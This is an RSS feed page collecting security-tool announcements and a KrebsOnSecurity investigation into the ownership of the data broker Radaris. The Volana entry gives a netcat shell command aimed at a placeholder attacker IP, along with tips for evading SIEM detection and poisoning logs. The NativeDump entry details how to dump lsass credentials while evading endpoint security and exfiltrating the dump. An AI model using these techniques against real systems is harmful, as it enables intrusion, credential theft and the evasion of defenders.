FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Yesterday — June 26th 2024Your RSS feeds

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

But Some index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    Before yesterdayYour RSS feeds

    CloudBrute - Awesome Cloud Enumerator

    By: Zion3R


    A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

    The complete writeup is available. here


    Motivation

    we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
    Here is the list issues on previous approaches we tried to fix:

    • separated wordlists
    • lack of proper concurrency
    • lack of supporting all major cloud providers
    • require authentication or keys or cloud CLI access
    • outdated endpoints and regions
    • Incorrect file storage detection
    • lack support for proxies (useful for bypassing region restrictions)
    • lack support for user agent randomization (useful for bypassing rare restrictions)
    • hard to use, poorly configured

    Features

    • Cloud detection (IPINFO API and Source Code)
    • Supports all major providers
    • Black-Box (unauthenticated)
    • Fast (concurrent)
    • Modular and easily customizable
    • Cross Platform (windows, linux, mac)
    • User-Agent Randomization
    • Proxy Randomization (HTTP, Socks5)

    Supported Cloud Providers

    Microsoft: - Storage - Apps

    Amazon: - Storage - Apps

    Google: - Storage - Apps

    DigitalOcean: - storage

    Vultr: - Storage

    Linode: - Storage

    Alibaba: - Storage

    Version

    1.0.0

    Usage

    Just download the latest release for your operation system and follow the usage.

    To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

    It looks like this

    providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
    environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
    proxytype: "http" # socks5 / http
    ipinfo: "" # IPINFO.io API KEY

    For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

    We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

    After setting up your API key, you are ready to use CloudBrute.

     ██████╗██╗      ██████╗ ██╗   ██╗██████╗ ██████╗ ██████╗ ██╗   ██╗████████╗███████╗
    ██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝
    ██║ ██║ ██║ ██║██║ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗
    ██║ ██║ ██║ ██║██║ ██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝
    ╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗
    ╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
    V 1.0.7
    usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
    -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
    <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
    [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
    [-m|--mode "<value>"] [-o|--output "<value>"]
    [-C|--configFolder "<value>"]

    Awesome Cloud Enumerator

    Arguments:

    -h --help Print help information
    -d --domain domain
    -k --keyword keyword used to generator urls
    -w --wordlist path to wordlist
    -c --cloud force a search, check config.yaml providers list
    -t --threads number of threads. Default: 80
    -T --timeout timeout per request in seconds. Default: 10
    -p --proxy use proxy list
    -a --randomagent user agent randomization
    -D --debug show debug logs. Default: false
    -q --quite suppress all output. Default: false
    -m --mode storage or app. Default: storage
    -o --output Output file. Default: out.txt
    -C --configFolder Config path. Default: config


    for example

    CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

    please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

    If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

    CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

    Dev

    • Clone the repo
    • go build -o CloudBrute main.go
    • go test internal

    in action

    How to contribute

    • Add a module or fix something and then pull request.
    • Share it with whomever you believe can use it.
    • Do the extra work and share your findings with community ♥

    FAQ

    How to make the best out of this tool?

    Read the usage.

    I get errors; what should I do?

    Make sure you read the usage correctly, and if you think you found a bug open an issue.

    When I use proxies, I get too many errors, or it's too slow?

    It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

    too fast or too slow ?

    change -T (timeout) option to get best results for your run.

    Credits

    Inspired by every single repo listed here .



    KrebsOnSecurity Threatened with Defamation Lawsuit Over Fake Radaris CEO

    On March 8, 2024, KrebsOnSecurity published a deep dive on the consumer data broker Radaris, showing how the original owners are two men in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites. The subjects of that piece are threatening to sue KrebsOnSecurity for defamation unless the story is retracted. Meanwhile, their attorney has admitted that the person Radaris named as the CEO from its inception is a fabricated identity.

    Radaris is just one cog in a sprawling network of people-search properties online that sell highly detailed background reports on U.S. consumers and businesses. Those reports typically include the subject’s current and previous addresses, partial Social Security numbers, any known licenses, email addresses and phone numbers, as well as the same information for any of their immediate relatives.

    Radaris has a less-than-stellar reputation when it comes to responding to consumers seeking to have their reports removed from its various people-search services. That poor reputation, combined with indications that the true founders of Radaris have gone to extraordinary lengths to conceal their stewardship of the company, was what prompted KrebsOnSecurity to investigate the origins of Radaris in the first place.

    On April 18, KrebsOnSecurity received a certified letter (PDF) from Valentin “Val” Gurvits, an attorney with the Boston Law Group, stating that KrebsOnSecurity would face a withering defamation lawsuit unless the Radaris story was immediately retracted and an apology issued to the two brothers named in the story as co-founders.

    That March story worked backwards from the email address used to register radaris.com, and charted an impressive array of data broker companies created over the past 15 years by Massachusetts residents Dmitry and Igor Lubarsky (also sometimes spelled Lybarsky or Lubarski). Dmitry goes by “Dan,” and Igor uses the name “Gary.”

    Those businesses included numerous websites marketed to Russian-speaking people who are new to the United States, such as russianamerica.com, newyork.ru, russiancleveland.com, russianla.com, russianmiami.com, etc. Other domains connected to the Lubarskys included Russian-language dating and adult websites, as well as affiliate programs for their international calling card businesses.

    A mind map of various entities apparently tied to Radaris and the company’s co-founders. Click to enlarge.

    The story on Radaris noted that the Lubarsky brothers registered most of their businesses using a made-up name — “Gary Norden,” sometimes called Gary Nord or Gary Nard.

    Mr. Gurvits’ letter stated emphatically that my reporting was lazy, mean-spirited, and obviously intended to smear the reputation of his clients. By way of example, Mr. Gurvits said the Lubarskys were actually Ukrainian, and that the story painted his clients in a negative light by insinuating that they were somehow associated with Radaris and with vaguely nefarious elements in Russia.

    But more to the point, Mr. Gurvits said, neither of his clients were Gary Norden, and neither had ever held any leadership positions at Radaris, nor were they financial beneficiaries of the company in any way.

    “Neither of my clients is a founder of Radaris, and neither of my clients is the CEOs of Radaris,” Gurvits wrote. “Additionally, presently and going back at least the past 10 years, neither of my clients are (or were) officers or employees of Radaris. Indeed, neither of them even owns (or ever owned) any equity in Radaris. In intentional disregard of these facts, the Article implies that my clients are personally responsible for Radaris’ actions. Therefore, you intentionally caused all negative allegations in the Article made with respect to Radaris to be imputed against my clients personally.”

    Dan Lubarsky’s Facebook page, just prior to the March 8 story about Radaris, said he was from Moscow.

    We took Mr. Gurvits’ word on the ethnicity of his clients, and adjusted the story to remove a single mention that they were Russian. We did so even though Dan Lubarsky’s own Facebook page said (until recently) that he was from Moscow, Russia.

    KrebsOnSecurity asked Mr. Gurvits to explain precisely which other details in the story were incorrect, and replied that we would be happy to update the story with a correction if they could demonstrate any errors of fact or omission.

    We also requested specifics about several aspects of the story, such as the identity of the current Radaris CEO — listed on the Radaris website as “Victor K.” Mr. Gurvits replied that Radaris is and always has been based in Ukraine, and that the company’s true founder “Eugene L” is based there.

    While Radaris has claimed to have offices in Massachusetts, Cyprus and Latvia, its website has never mentioned Ukraine. Mr. Gurvits has not responded to requests for more information about the identities of “Eugene L” or “Victor K.”

    Gurvits said he had no intention of doing anyone’s reporting for them, and that the Lubarskys were going to sue KrebsOnSecurity for defamation unless the story was retracted in full. KrebsOnSecurity replied that journalists often face challenges to things that they report, but it is more than rare for one who makes a challenge to take umbrage at being asked for supporting information.

    On June 13, Mr. Gurvits sent another letter (PDF) that continued to claim KrebsOnSecurity was defaming his clients, only this time Gurvits said his clients would be satisfied if KrebsOnSecurity just removed their names from the story.

    “Ultimately, my clients don’t care what you say about any of the websites or corporate entities in your Article, as long as you completely remove my clients’ names from the Article and cooperate with my clients to have copies of the Article where my clients’ names appear removed from the Internet,” Mr. Gurvits wrote.

    MEET THE FAKE RADARIS CEO

    The June 13 letter explained that the name Gary Norden was a pseudonym invented by the Radaris marketing division, but that neither of the Lubarsky brothers were Norden.

    This was a startling admission, given that Radaris has quoted the fictitious Gary Norden in press releases published and paid for by Radaris, and in news media stories where the company is explicitly seeking money from investors. In other words, Radaris has been misrepresenting itself to investors from the beginning. Here’s a press release from Radaris that was published on PR Newswire in April 2011:

    A press release published by Radaris in 2011 names the CEO of Radaris as Gary Norden, which was a fake name made up by Radaris’ marketing department.

    In April 2014, the Boston Business Journal published a story (PDF) about Radaris that extolled the company’s rapid growth and considerable customer base. The story noted that, “to date, the company has raised less than $1 million from Cyprus-based investment company Difive.”

    “We live in a world where information becomes much more broad and much more available every single day,” the Boston Business Journal quoted Radaris’ fake CEO Gary Norden, who by then had somehow been demoted from CEO to vice president of business development.

    A Boston Business Journal story from April 2014 quotes the fictitious Radaris CEO Gary Norden.

    “We decided there needs to be a service that allows for ease of monitoring of information about people,” the fake CEO said. The story went on to say Radaris was seeking to raise between $5 million and $7 million from investors in the ensuing months.

    THE BIG LUBARSKY

    In his most recent demand letter, Mr. Gurvits helpfully included resumes for both of the Lubarsky brothers.

    Dmitry Lubarsky’s resume states he is the owner of Difive.com, a startup incubator for IT companies. Recall that Difive is the same company mentioned by the fake Radaris CEO in the 2014 Boston Business Journal story, which said Difive was the company’s initial and sole investor.

    Difive’s website in 2016 said it had offices in Boston, New York, San Francisco, Riga (Latvia) and Moscow (nothing in Ukraine). Meanwhile, DomainTools.com reports difive.com was originally registered in 2007 to the fictitious Gary Norden from Massachusetts.

    Archived copies of the Difive website from 2017 include a “Portfolio” page indexing all of the companies in which Difive has invested. That list, available here, includes virtually every “Gary Norden” domain name mentioned in my original report, plus a few that escaped notice earlier.

    Dan Lubarsky’s resume says he was CEO of a people search company called HumanBook. The Wayback machine at archive.org shows the Humanbook domain (humanbook.com) came online around April 2008, when the company was still in “beta” mode.

    By August 2008, however, humanbook.com had changed the name advertised on its homepage to Radaris Beta. Eventually, Humanbook simply redirected to radaris.com.

    Archive.org’s record of humanbook.com from 2008, just after its homepage changed to Radaris Beta.

    Astute readers may notice that the domain radaris.com is not among the companies listed as Difive investments. However, passive domain name system (DNS) records from DomainTools show that between October 2023 and March 2024 radaris.com was hosted alongside all of the other Gary Norden domains at the Internet address range 38.111.228.x.

    That address range simultaneously hosted every domain mentioned in this story and in the original March 2024 report as connected to email addresses used by Gary Norden, including radaris.com, radaris.ru, radaris.de, difive.com, privet.ru, blog.ru, comfi.com, phoneowner.com, russianamerica.com, eprofit.com, rehold.com, homeflock.com, humanbook.com and dozens more. A spreadsheet of those historical DNS entries for radaris.com is available here (.csv).

    Image: DomainTools.com

    The breach tracking service Constella Intelligence finds just two email addresses ending in difive.com have been exposed in data breaches over the years: dan@difive.com, and gn@difive.com. Presumably, “gn” stands for Gary Norden.

    A search on the email address gn@difive.com via the breach tracking service osint.industries reveals this address was used to create an account at Airbnb under the name Gary, with the last four digits of the account’s phone number ending in “0001.”

    Constella Intelligence finds gn@difive.com was associated with the Massachusetts number 617-794-0001, which was used to register accounts for “Igor Lybarsky” from Wellesley or Sherborn, Ma. at multiple online businesses, including audiusa.com and the designer eyewear store luxottica.com.

    The phone number 617-794-0001 also appears for a “Gary Nard” user at russianamerica.com. Igor Lubarsky’s resume says he was the manager of russianamerica.com.

    DomainTools finds 617-794-0001 is connected to registration records for three domains, including paytone.com, a domain that Dan Lubarsky’s resume says he managed. DomainTools also found that number on the registration records for trustoria.com, another major consumer data broker that has an atrocious reputation, according to the Better Business Bureau.

    Dan Lubarsky’s resume says he was responsible for several international telecommunications services, including the website comfi.com. DomainTools says the phone number connected to that domain — 617-952-4234 — was also used on the registration records for humanbook.net/biz/info/mobi/us, as well as for radaris.me, radaris.in, and radaris.tel.

    Two other key domains are connected to that phone number. The first is barsky.com, which is the website for Barsky Estate Realty Trust (PDF), a real estate holding company controlled by the Lubarskys. Naturally, DomainTools finds barsky.com also was registered to a Gary Norden from Massachusetts. But the organization listed in the barsky.com registration records is Comfi Inc., a VOIP communications firm that Dan Lubarsky’s resume says he managed.

    The other domain of note is unipointtechnologies.com. Dan Lubarsky’s resume says he was the CEO of Wellesley Hills, Mass-based Unipoint Technology Inc. In 2012, Unipoint was fined $179,000 by the U.S. Federal Communications Commission, which said the company had failed to apply for a license to provide international telecommunications services.

    A pandemic assistance loan granted in 2020 to Igor Lybarsky of Sherborn, Ma. shows he received the money to an entity called Norden Consulting.

    Notice the name on the recipient of this government loan for Igor Lybarsky from Sherborn, Ma: Norden Consulting. 

    PATENTLY REMARKABLE

    The 2011 Radaris press release quoting their fake CEO Gary Norden said the company had four patents pending from a team of computer science PhDs. According to the resume shared by Mr. Gurvits, Dan Lubarsky has a PhD in computer science.

    The U.S. Patent and Trademark Office (PTO) says Dan Lubarsky/Lubarski has at least nine technology patents to his name. The fake CEO press release from Radaris mentioning its four patents was published in April 2011. By that time, the PTO says Dan Lubarsky had applied for exactly four patents, including, “System and Method for a Web-Based People Directory.” The first of those patents, published in 2009, is tied to Humanbook.com, the company Dan Lubarsky founded that later changed its name to Radaris.

    If the Lubarskys were never involved in Radaris, how do they or their attorney know the inside information that Gary Norden is a fiction of Radaris’ marketing department? KrebsOnSecurity has learned that Mr. Gurvits is the same attorney responding on behalf of Radaris in a lawsuit against the data broker filed earlier this year by Atlas Data Privacy.

    Mr. Gurvits also stepped forward as Radaris’ attorney in a class action lawsuit the company lost in 2017 because it never contested the claim in court. When the plaintiffs told the judge they couldn’t collect on the $7.5 million default judgment, the judge ordered the domain registry Verisign to transfer the radaris.com domain name to the plaintiffs.

    Mr. Gurvits appealed the verdict, arguing that the lawsuit hadn’t named the actual owners of the Radaris domain name — a Cyprus company called Bitseller Expert Limited — and thus taking the domain away would be a violation of their due process rights.

    The judge ruled in Radaris’ favor — halting the domain transfer — and told the plaintiffs they could refile their complaint. Soon after, the operator of Radaris changed from Bitseller to Andtop Company, an entity formed (PDF) in the Marshall Islands in Oct. 2020. Andtop also operates the aforementioned people-search service Trustoria.

    Mr. Gurvits’ most-publicized defamation case was a client named Aleksej Gubarev, a Russian technology executive whose name appeared in the Steele Dossier. That document included a collection of salacious, unverified information gathered by the former British intelligence officer Christopher Steele during the 2016 U.S. presidential campaign at the direction of former president Donald Trump’s political rivals.

    Gubarev, the head of the IT services company XBT Holding and the Florida web hosting firm Webzilla, sued BuzzFeed for publishing the Steele dossier. One of the items in the dossier alleged that XBT/Webzilla and affiliated companies played a key role in the hack of Democratic Party computers in the spring of 2016. The memo alleged Gubarev had been coerced into providing services to Russia’s main domestic security agency, known as the FSB.

    In December 2018, a federal judge in Miami ruled in favor of BuzzFeed, saying the publication was protected by the fair report privilege, which gives news organizations latitude in reporting on official government proceedings.

    Radaris was originally operated by Bitseller Expert Limited. Who owns Bitseller Expert Limited? A report (PDF) obtained from the Cyprus business registry shows this company lists its director as Pavel Kaydash from Moscow. Mr. Kaydash could not be reached for comment.

    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Zion3R


    Shell command obfuscation to avoid SIEM/detection system

    During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

    volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


    Usage

    You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

    ## Download it from github release
    ## If you do not have internet access from compromised machine, find another way
    curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
    volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
    volana » [command]

    Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

    from non interactive shell

    Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
    ## (Here a nc bindshell to obtain a interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

    Copy encrypted command and executed it with your rce on target machine

    ./volana decr [encrypted_command]
    ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

    Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

    Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

    By detected we mean if we are able to trigger an alert if a certain command has been executed.

    Hide from

    Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

    • Detection systems that are based on history command output
    • Detection systems that are based on history files
    • .bash_history, ".zsh_history" etc ..
    • Detection systems that are based on bash debug traps
    • Detection systems that are based on sudo built-in logging system
    • Detection systems tracing all processes syscall system-wide (eg opensnoop)
    • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
    • Command detection Could be avoid with volana with encryption

    Visible for

    • Detection systems that have alert for unknown command (volana one)
    • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
    • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
    • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
    • Custom LD_PRELOAD injection to make log
    • Not a common case at all

    Bug bounty

    Sorry for the clickbait title, but no money will be provided for contibutors. 🐛

    Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

    Report here

    Credit



    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Zion3R


    NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


    • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp":

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

    Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading Minidump undocumented structures, its structure can be summed up to:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-bytes structure which can be defined in C# as:

    public struct MinidumpHeader
    {
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
    }

    The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


    B. Stream Directory

    Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
    public uint StreamType;
    public uint Size;
    public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream
    0x16 HandleOperationListStream

    C. SystemInformation Stream

    First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
    }

    The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


    D. ModuleList Stream

    Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
    }

    As there is only one, it gets simplified to:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
    }

    The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


    E. Memory64List Stream

    Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

    public struct Memory64ListStream
    {
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
    }

    Each module entry is a 16-bytes structure:

    public struct Memory64Info
    {
    public IntPtr Address;
    public IntPtr Size;
    }

    The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


    F. Looping memory regions

    There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
    2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

    With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


    G. Creating Minidump file

    After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




    Sttr - Cross-Platform, Cli App To Perform Various Operations On String

    By: Zion3R


    sttr is command line software that allows you to quickly run various transformation operations on the string.


    // With input prompt
    sttr

    // Direct input
    sttr md5 "Hello World"

    // File input
    sttr md5 file.text
    sttr base64-encode image.jpg

    // Reading from different processor like cat, curl, printf etc..
    echo "Hello World" | sttr md5
    cat file.txt | sttr md5

    // Writing output to a file
    sttr yaml-json file.yaml > file-output.json

    :movie_camera: Demo

    :battery: Installation

    Quick install

    You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder

    curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

    Webi

    MacOS / Linux

    curl -sS https://webi.sh/sttr | sh

    Windows

    curl.exe https://webi.ms/sttr | powershell

    See here

    Homebrew

    If you are on macOS and using Homebrew, you can install sttr with the following:

    brew tap abhimanyu003/sttr
    brew install sttr

    Snap

    sudo snap install sttr

    Arch Linux

    yay -S sttr-bin

    Scoop

    scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
    scoop install sttr

    Go

    go install github.com/abhimanyu003/sttr@latest

    Manually

    Download the pre-compiled binaries from the Release! page and copy them to the desired location.

    :books: Guide

    • After installation simply run sttr command.
    // For interactive menu
    sttr
    // Provide your input
    // Press two enter to open operation menu
    // Press `/` to filter various operations.
    // Can also press UP-Down arrows select various operations.
    • Working with help.
    sttr -h

    // Example
    sttr zeropad -h
    sttr md5 -h
    • Working with files input.
    sttr {command-name} {filename}

    sttr base64-encode image.jpg
    sttr md5 file.txt
    sttr md-html Readme.md
    • Writing output to file.
    sttr yaml-json file.yaml > file-output.json
    • Taking input from other command.
    curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
    • Chaining the different processor.
    sttr md5 hello | sttr base64-encode

    echo "Hello World" | sttr base64-encode | sttr md5

    :boom: Supported Operations

